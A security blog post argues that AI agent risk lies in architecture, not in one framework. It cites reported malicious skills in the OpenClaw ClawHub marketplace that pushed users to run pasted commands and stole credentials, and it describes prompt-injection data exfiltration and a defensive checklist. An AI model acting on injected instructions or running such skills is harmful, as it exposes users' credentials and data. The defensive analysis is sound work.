Vulnerable U
Posts
the problem isn’t OpenClaw. it’s the architecture.

the problem isn’t OpenClaw. it’s the architecture.

Newsroom
February 13, 2026

If you’ve been playing with agent frameworks lately, you’ve probably felt this shift in your gut:

A chatbot answers questions.
An agent does things.

It runs commands. It edits files. It clicks around your browser. It glues tools together and keeps going until it hits the goal you gave it.

That’s not “prompting in a tab.” That’s closer to onboarding a junior engineer… and then handing them your laptop password.

And yeah, I know that sounds dramatic. But the last couple weeks around OpenClaw made the risk impossible to ignore.

OpenClaw is the canary, not the problem

In late January / early February 2026, security folks started flagging a wave of malicious “skills” landing in ClawHub (OpenClaw’s skill marketplace). The reports weren’t subtle: large numbers of malicious skills, supply-chain style distribution, and “setup steps” that essentially boil down to please copy/paste this suspicious command into your terminal.
See: The Hacker News coverage of the malicious ClawHub skills and Tom’s Hardware’s writeup.

Then OpenClaw responded by partnering with VirusTotal to scan third-party skills (helpful, but not a cure-all).
See: The Verge on OpenClaw integrating scanning after the malicious skills flood and The Hacker News on the VirusTotal integration.

If your takeaway from this is “wow, OpenClaw is messy,” you’re not wrong.

But you’re also missing the bigger point.

OpenClaw is just the first agent ecosystem to get punched in the mouth at scale. This same story is going to replay anywhere we have:

autonomous tool use
easy plugin installs
users who want things to “just work”
attackers who love free distribution

So no, the lesson isn’t “OpenClaw bad.”

The lesson is: agent + tools + marketplace is a new attack surface.

prompts are not policies

Here’s the trap: people write a strong system prompt and call it “guardrails.”

“Never exfiltrate secrets.”
“Only store credentials in Vault.”
“Ask me before running risky commands.”

Nice intentions. Not enforcement.

The moment your agent reads untrusted content (web pages, emails, tickets, docs pasted from who-knows-where), prompt injection becomes a real operational risk. Anthropic has been blunt about this in the context of browser agents: the web is adversarial, and prompt injection defenses are still an active area of work.
Read: Anthropic’s “Mitigating the risk of prompt injections in browser use”.

Simon Willison has a super practical framing for when this gets dangerous. He calls it the “lethal trifecta”:

the agent can access private data
it can ingest untrusted content
it can communicate externally

Put those three together and it’s shockingly easy to build a data-exfil machine without meaning to.
Read: Simon Willison’s “The lethal trifecta for AI agents”.

This is why I keep saying: a prompt is not a security boundary. It’s a suggestion. Sometimes a good one! Still a suggestion.

why tool access explodes the blast radius

A normal chatbot hallucinating is annoying.

An agent hallucinating can wreck your day.

Tool use changes the failure mode from “wrong answer” to “wrong action.”

OWASP basically codified this in the 2025 LLM Top 10. A few entries map directly to agent-style problems:

prompt injection
supply chain risk
improper output handling (piping model output directly into downstream systems)
excessive agency (letting the model take too many actions with too much access)

If you haven’t skimmed that list yet, it’s worth it.
See: OWASP Top 10 for LLM Applications v2025 (PDF).

The “improper output handling” one is especially spicy for agents. If the model can output something that later becomes:

a shell command
a Terraform change
a SQL query
a CI step
a “helpful” one-liner you copy/paste

…you’ve basically created an injection surface with extra steps.

And the plugin/skill ecosystem makes it worse, because now we’re not just trusting the model. We’re trusting third-party code and instructions that the user installs because the marketplace UI made it look legit.

That’s exactly what the OpenClaw/ClawHub incidents showed: malicious skills dressed up as useful automation, nudging people into risky execution paths, then grabbing credentials and data.

we don’t have adult operational norms yet

You can tell we’re early because everyone’s behavior is all over the place:

Some folks are buying a dedicated machine just to run agents.
Other folks are running them on their main laptop - the same one with saved browser sessions, SSH keys, tax docs, password manager unlocked half the day, you name it.

That divergence alone is a tell: we don’t have mature defaults.

When something is mature, you don’t need a debate thread to learn the safe baseline. The baseline is obvious, boring, and widely shared.

Right now, with agents, the baseline is vibes. It also feels like most people are installing and running Skills without fully reading them or understanding what they do.

what “grown-up agent security” looks like

If you want a mental model that actually helps, treat your agent like production infrastructure.

Not a cute productivity app. Infrastructure.

Here’s the checklist I’d want in place before I let an agent anywhere near real credentials.

1) sandbox the runtime (for real)

If the agent gets tricked, you want it trapped in a box you can delete without feeling pain:

a VM
a container with actual restrictions
a separate OS user
a separate machine

The goal is simple: compromise happens, damage stays contained.

2) scope credentials like you actually mean it

Stop handing agents “god tokens.”

Give it the smallest possible permissions for the shortest possible time.

If the agent only needs to read one repo, don’t give it write access to all repos. If it only needs access to a single service account, don’t hand it your personal credentials.

3) restrict tools, don’t “ask nicely”

“Ask before doing risky things” is not a control. It’s a UX preference.

Hard controls beat polite instructions:

allowlist commands (or tool actions)
deny outbound network by default
require approval for high-risk actions (payments, sending messages, deleting files, pushing to prod)

Yes, that introduces friction. That friction is the point.

4) log actions, not just the chat

If your agent can run commands and change files, you need visibility into:

commands executed
files written/modified
network egress (where it talked to, what it sent)
tool invocation history

A conversation transcript is not an audit trail.

5) treat skills/plugins like dependencies

Skill marketplaces are package registries wearing a nicer outfit.

And we already know how this goes.

This is why curated marketplaces exist at all. Trail of Bits’ curated skills repo is explicitly positioned as a community-reviewed gate because untrusted skills have shown up with “backdoors or malicious hooks.”
See: trailofbits/skills-curated.

If you’re installing a skill that can execute code locally, you should treat it like running a random binary from the internet. Because that’s basically what it is.

OpenClaw is going to improve. They’ll scan more. They’ll add guardrails. They’ll get yelled at into building better controls. That’s fine.

But the bigger issue isn’t one agent framework’s bug count.

It’s the mismatch between capability and boundaries.

We’re deploying autonomous execution engines faster than we’re defining the security model around them.

And if you’re thinking, “that sounds like every other tech wave,” yeah. Exactly. The only difference is the failure mode is closer to “oops, it executed” than “oops, it rendered wrong.”

Agents aren’t inherently malicious. Most of the time they’re trying to help.

But they’re powerful systems operating in messy environments, eating untrusted inputs, and acting with permissions we often haven’t properly scoped.

Treating that as a harmless productivity tool is a category error.

So if you want to run agents today, I’m not saying don’t do it. I’m saying do it like an adult:

sandbox, least privilege, segmentation, observability.

Because the agent wave is happening either way.

The only question is whether it happens on your terms, or on an attacker’s.